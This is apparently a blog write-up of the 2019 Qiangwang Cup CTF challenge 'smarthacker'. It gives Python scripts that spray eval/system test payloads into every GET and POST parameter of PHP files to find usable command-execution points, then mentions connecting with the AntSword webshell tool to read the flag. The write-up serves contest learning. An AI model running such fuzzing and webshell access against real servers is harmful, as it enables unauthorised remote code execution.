[2019 强网杯-smarthacker]

打开网址 下载源码

发现源码中有一堆命令执行的代码 有大部分执行不了

如$_GET['ganVMUq3d']先赋值

image

用脚本跑出能命令执行的php

对system() eval() assert()构造出相应的payload

assert()和eval()可以执行 eval("echo 'hello';");

image

image

system()可以执行 echo hello

image

其实可以不用给system() assert() eval()构造各自能执行的payload
因为这道题能回显报错信息

在kali下用 find 文件目录 -type f |xargs grep "查询内容" 匹配出php中用的传递参数的函数(REQUEST   POST   GET)
本题只用了   POST   GET

#过滤php
import os
import threading
from concurrent.futures.thread import ThreadPoolExecutor
import requests
import re

path = "E:/phpstudy_pro/WWW/src"

files = os.listdir(path)
# 互斥锁
mutex = threading.Lock()
# 进程数
pool = ThreadPoolExecutor(max_workers=50)


def read_file(file):
    f = open(path + "/" + file)
    text = f.read()
    f.close()
    # 过滤GET接收的变量
    GET = re.findall("_GET.'(.*?)']", text)
    # 过滤POST接收的变量
    POST = re.findall("_POST.'(.*?)']", text)
    # eval assert payload
    data1 = """eval("echo 'hello word';");"""
    # system payload
    data2 = "echo hello"
    aaa = "hello"
    x = {}
    y = {}
    a = {}
    b = {}
    for i in GET:
        a[i] = data1
        b[i] = data2
    for i in POST:
        x[i] = data1
        y[i] = data2
    # eval assert 测试
    r = requests.post(url="http://网址/" + file, data=x, params=a)
    # system 测试
    c = requests.post(url="http://网址/" + file, data=y, params=b)
    if aaa in r.text or aaa in c.text:
        mutex.acquire()
        print(file + " found!")
        mutex.release()


for file in files:  # 遍历文件夹
    pool.submit(read_file, file)

image

然后过滤出可命令执行的php中传递的有效变量

#过滤变量及传参方式
import re
import requests

path = "E:/phpstudy_pro/WWW/src"
file = "xk0SzyKwfzw.php"
f = open(path + "/" + file)
text = f.read()
f.close()
GET = re.findall("_GET.'(.*?)']", text)
POST = re.findall("_POST.'(.*?)']", text)
data1 = """eval("echo 'hello';");"""
data2 = "echo hello"
aaa = "hello"
for i in GET:
    a = {}
    b = {}
    a[i] = data1
    b[i] = data2
    r = requests.post(url="http://网址/" + file, params=a)
    c = requests.post(url="http://网址/" + file, params=b)
    if aaa in r.text or aaa in c.text:
        print(file + "\nGET\n" + i)
for i in POST:
    x = {}
    y = {}
    x[i] = data1
    y[i] = data2
    r = requests.post(url="http://网址/" + file, data=x)
    c = requests.post(url="http://网址/" + file, data=y)
    if aaa in r.text or aaa in c.text:
        print(file + "\nPOST\n" + i)

image

蚁剑连上或者手工命令执行梭哈flag

image

posted @ 2021-08-08 18:03  地狱✟祈祷  阅读(151)  评论(0编辑  收藏  举报